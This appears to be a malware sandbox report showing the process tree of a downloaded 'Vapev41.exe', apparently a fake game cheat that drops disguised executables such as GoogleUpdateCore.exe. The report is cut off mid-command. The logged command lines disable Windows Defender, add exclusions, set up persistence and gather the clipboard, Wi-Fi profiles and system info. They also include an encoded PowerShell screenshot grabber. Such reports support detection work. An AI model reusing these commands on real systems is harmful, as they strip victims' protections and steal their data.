C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb058246f8,0x7ffb05824708,0x7ffb058247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5584 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5800 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Downloads\Vapev41.exe"C:\Users\Admin\Downloads\Vapev41.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GoogleUpdateCore" /tr "C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\VapeV4.exe"C:\Users\Admin\AppData\Roaming\VapeV4.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Vape Updated.exe"C:\Users\Admin\AppData\Roaming\Vape Updated.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Vape.exe"C:\Users\Admin\AppData\Roaming\Vape.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Vape.exe"C:\Users\Admin\AppData\Roaming\Vape.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe8⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c run.bat9⤵
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -version10⤵
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M11⤵
- Modifies file permissions
-
C:\Windows\system32\choice.exechoice /c YN10⤵
-
C:\Windows\system32\tar.exetar -xf oldassets.zip10⤵
-
C:\Windows\system32\tar.exetar -xf newassets.zip10⤵
-
C:\Windows\system32\tar.exetar -xf mappings.zip10⤵
-
C:\Windows\system32\PING.EXEping localhost -n 5.510⤵
- Runs ping.exe
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava --add-opens java.base/java.lang=ALL-UNNAMED -jar vape-loader.jar10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"7⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"7⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"7⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"7⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"7⤵
-
C:\Windows\system32\tree.comtree /A /F8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"7⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7A